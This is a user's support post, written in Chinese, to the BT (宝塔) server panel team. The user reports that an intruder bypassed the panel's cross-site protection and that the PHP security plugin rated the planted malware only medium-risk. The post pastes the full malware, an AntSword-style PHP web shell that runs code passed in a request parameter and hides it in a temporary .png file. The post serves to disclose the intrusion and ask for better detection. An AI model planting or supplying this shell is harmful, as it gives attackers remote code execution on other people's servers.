为了能快速了解并处理您的问题,请提供以下基础信息: 面板、插件版本:宝塔面板版本:7.9.96 插件版本:PHP网站安全告警 3.1
系统版本:CentOS 7.9.2009 x86_64(Py3.7.9)
问题描述:宝塔面板好像有防跨站漏洞,我被别人入侵了…他都能直接修改我文件…还有病毒代码宝塔检测病毒的,还检测不到,并且宝塔内的PHP网站安全告警软件,只警告了说中危,还没有给这个代码隔离,还提示中危,这明明已经是高危了!!! 希望尽快更新一下病毒库,优化防跨站问题…把这个做的更好 另外:关于防跨站问题,我也不知道他是怎么修改成功了,正常情况下,是不能修改的,对方给我说,他是直接上传覆盖防跨站文件修改的!具体插件提示和病毒放下面和图片上了! 第一张图,是他的入侵我服务器的工具! 病毒代码如下: <?php error_reporting(E_ALL); $request = $_REQUEST; class AntSword { private $code; public function __construct() { $password = $this->request('password'); $code = $password ? $this->decode($password) : $this->response404(); if (empty($code)) $this->response404(); $this->code = $code; } public function file() { $content = '<?php' . PHP_EOL . $this->code; $file_name = md5_file(__FILE__) . '.png'; call_user_func('file_put_contents', $file_name, $content, LOCK_EX); return $file_name; } public function request($name, $default = null) { global $request; return empty($request[$name]) ? $default : $request[$name]; } public function decode($content) { $codec = $this->request('codec', 'default'); if ($codec == 'base64_rot13') { return base64_decode(str_rot13($content)); } return $content; } public function response404() { if (function_exists('http_response_code')) http_response_code(404); exit; } } $file_name = (new AntSword)->file(); error_reporting(E_ERROR); require $file_name; if (file_exists($file_name)) unlink($file_name);
|
|